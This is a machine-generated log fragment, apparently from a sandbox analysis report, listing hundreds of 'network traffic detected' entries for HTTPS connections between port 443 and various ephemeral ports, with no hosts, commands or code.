            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
            Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
            Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
            Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
            Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
            Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
